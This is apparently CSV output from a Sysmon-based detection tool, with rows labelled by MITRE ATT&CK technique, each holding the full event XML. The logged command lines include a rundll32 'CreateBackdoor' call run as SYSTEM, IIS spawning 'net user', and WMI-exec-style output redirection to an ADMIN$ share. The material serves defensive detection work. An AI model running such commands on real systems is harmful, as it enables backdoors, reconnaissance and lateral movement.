<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1579034803.819347,2020-01-15T00:46:43.819347+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 url.dll,OpenURL ms-browser:// )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-01-14T20:46:43.237922Z"">
</TimeCreated>
<EventRecordID>340</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1840"" ThreadID=""8032"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-01-14 20:46:43.232</Data>
<Data Name=""ProcessGuid"">747F3D96-28B3-5E1E-0000-00101DF17B00</Data>
<Data Name=""ProcessId"">3412</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 url.dll,OpenURL ms-browser://</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-28B3-5E1E-0000-002057EB7B00</Data>
<Data Name=""LogonId"">0x7beb57</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-28B3-5E1E-0000-0010CAEC7B00</Data>
<Data Name=""ParentProcessId"">1632</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1579034803.819347,2020-01-15T00:46:43.819347+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 url.dll,OpenURL ms-browser:// )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-01-14T20:46:43.237922Z"">
</TimeCreated>
<EventRecordID>340</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1840"" ThreadID=""8032"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-01-14 20:46:43.232</Data>
<Data Name=""ProcessGuid"">747F3D96-28B3-5E1E-0000-00101DF17B00</Data>
<Data Name=""ProcessId"">3412</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 url.dll,OpenURL ms-browser://</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-28B3-5E1E-0000-002057EB7B00</Data>
<Data Name=""LogonId"">0x7beb57</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-28B3-5E1E-0000-0010CAEC7B00</Data>
<Data Name=""ParentProcessId"">1632</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.513362,2020-03-21T09:00:25.513362+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:25.499077Z"">
</TimeCreated>
<EventRecordID>243562</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:25.488</Data>
<Data Name=""ProcessGuid"">747F3D96-9F69-5E75-0000-00105B9A2000</Data>
<Data Name=""ProcessId"">2028</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
Detect IIS/Exchange Exploitation,1558661633.122501,2019-05-24T05:33:53.122501+04:00,,Threat,Critical,IIS run command with user (IIS APPPOOL\DefaultAppPool) and process name (C:\Windows\System32\cmd.exe) and commandline ( &quot;c:\windows\system32\cmd.exe&quot; /c net user ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-24T01:33:53.112486Z"">
</TimeCreated>
<EventRecordID>1044</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2032"" ThreadID=""2092"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-24 01:33:53.112</Data>
<Data Name=""ProcessGuid"">365ABB72-4A01-5CE7-0000-0010EE9DAC00</Data>
<Data Name=""ProcessId"">2404</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;c:\windows\system32\cmd.exe&quot; /c net user</Data>
<Data Name=""CurrentDirectory"">c:\windows\system32\inetsrv\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-45C7-5CE7-0000-002092F99C00</Data>
<Data Name=""LogonId"">0x9cf992</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-49D6-5CE7-0000-001020A7A700</Data>
<Data Name=""ParentProcessId"">2580</Data>
<Data Name=""ParentImage"">C:\Windows\System32\inetsrv\w3wp.exe</Data>
<Data Name=""ParentCommandLine"">c:\windows\system32\inetsrv\w3wp.exe -ap &quot;DefaultAppPool&quot; -v &quot;v2.0&quot; -l &quot;webengine4.dll&quot; -a \\.\pipe\iisipm719e5ea8-b97b-40d0-96b6-44cca91790fe -h &quot;C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config&quot; -w &quot;&quot; -m 0 -t 20</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1584766825.513362,2020-03-21T09:00:25.513362+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:25.499077Z"">
</TimeCreated>
<EventRecordID>243562</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:25.488</Data>
<Data Name=""ProcessGuid"">747F3D96-9F69-5E75-0000-00105B9A2000</Data>
<Data Name=""ProcessId"">2028</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1556656371.324839,2019-05-01T00:32:51.324839+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd 1&gt; \\127.0.0.1\ADMIN$\__1556656369.7 2&gt;&amp;1 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-30T20:32:51.246714Z"">
</TimeCreated>
<EventRecordID>9827</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1964"" ThreadID=""1664"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-04-30 20:32:51.246</Data>
<Data Name=""ProcessGuid"">365ABB72-B0F3-5CC8-0000-0010B1361D00</Data>
<Data Name=""ProcessId"">2504</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd.exe /Q /c cd 1&gt; \\127.0.0.1\ADMIN$\__1556656369.7 2&gt;&amp;1</Data>
<Data Name=""CurrentDirectory"">C:\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-B0F2-5CC8-0000-00203D311D00</Data>
<Data Name=""LogonId"">0x1d313d</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-B0C0-5CC8-0000-001017C31C00</Data>
<Data Name=""ParentProcessId"">836</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558661633.122501,2019-05-24T05:33:53.122501+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;c:\windows\system32\cmd.exe&quot; /c net user ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-24T01:33:53.112486Z"">
</TimeCreated>
<EventRecordID>1044</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2032"" ThreadID=""2092"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-24 01:33:53.112</Data>
<Data Name=""ProcessGuid"">365ABB72-4A01-5CE7-0000-0010EE9DAC00</Data>
<Data Name=""ProcessId"">2404</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;c:\windows\system32\cmd.exe&quot; /c net user</Data>
<Data Name=""CurrentDirectory"">c:\windows\system32\inetsrv\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-45C7-5CE7-0000-002092F99C00</Data>
<Data Name=""LogonId"">0x9cf992</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-49D6-5CE7-0000-001020A7A700</Data>
<Data Name=""ParentProcessId"">2580</Data>
<Data Name=""ParentImage"">C:\Windows\System32\inetsrv\w3wp.exe</Data>
<Data Name=""ParentCommandLine"">c:\windows\system32\inetsrv\w3wp.exe -ap &quot;DefaultAppPool&quot; -v &quot;v2.0&quot; -l &quot;webengine4.dll&quot; -a \\.\pipe\iisipm719e5ea8-b97b-40d0-96b6-44cca91790fe -h &quot;C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config&quot; -w &quot;&quot; -m 0 -t 20</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1556656371.324839,2019-05-01T00:32:51.324839+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd 1&gt; \\127.0.0.1\ADMIN$\__1556656369.7 2&gt;&amp;1 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-30T20:32:51.246714Z"">
</TimeCreated>
<EventRecordID>9827</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1964"" ThreadID=""1664"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-04-30 20:32:51.246</Data>
<Data Name=""ProcessGuid"">365ABB72-B0F3-5CC8-0000-0010B1361D00</Data>
<Data Name=""ProcessId"">2504</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd.exe /Q /c cd 1&gt; \\127.0.0.1\ADMIN$\__1556656369.7 2&gt;&amp;1</Data>
<Data Name=""CurrentDirectory"">C:\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-B0F2-5CC8-0000-00203D311D00</Data>
<Data Name=""LogonId"">0x1d313d</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-B0C0-5CC8-0000-001017C31C00</Data>
<Data Name=""ParentProcessId"">836</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1556656371.324839,2019-05-01T00:32:51.324839+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd 1&gt; \\127.0.0.1\ADMIN$\__1556656369.7 2&gt;&amp;1 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-30T20:32:51.246714Z"">
</TimeCreated>
<EventRecordID>9827</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1964"" ThreadID=""1664"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-04-30 20:32:51.246</Data>
<Data Name=""ProcessGuid"">365ABB72-B0F3-5CC8-0000-0010B1361D00</Data>
<Data Name=""ProcessId"">2504</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd.exe /Q /c cd 1&gt; \\127.0.0.1\ADMIN$\__1556656369.7 2&gt;&amp;1</Data>
<Data Name=""CurrentDirectory"">C:\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-B0F2-5CC8-0000-00203D311D00</Data>
<Data Name=""LogonId"">0x1d313d</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-B0C0-5CC8-0000-001017C31C00</Data>
<Data Name=""ParentProcessId"">836</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564911238.127145,2019-08-04T13:33:58.127145+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\windows\system32\cmd.exe &quot;C:\Windows\system32\osk.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-08-04T09:33:58.087775Z"">
</TimeCreated>
<EventRecordID>5764</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2780"" ThreadID=""3676"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-08-04 09:33:57.876</Data>
<Data Name=""ProcessGuid"">747F3D96-A685-5D46-0000-00100D41D703</Data>
<Data Name=""ProcessId"">3296</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">C:\windows\system32\cmd.exe &quot;C:\Windows\system32\osk.exe&quot; </Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\Desktop\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-56A3-5D45-0000-0020FBD31800</Data>
<Data Name=""LogonId"">0x18d3fb</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
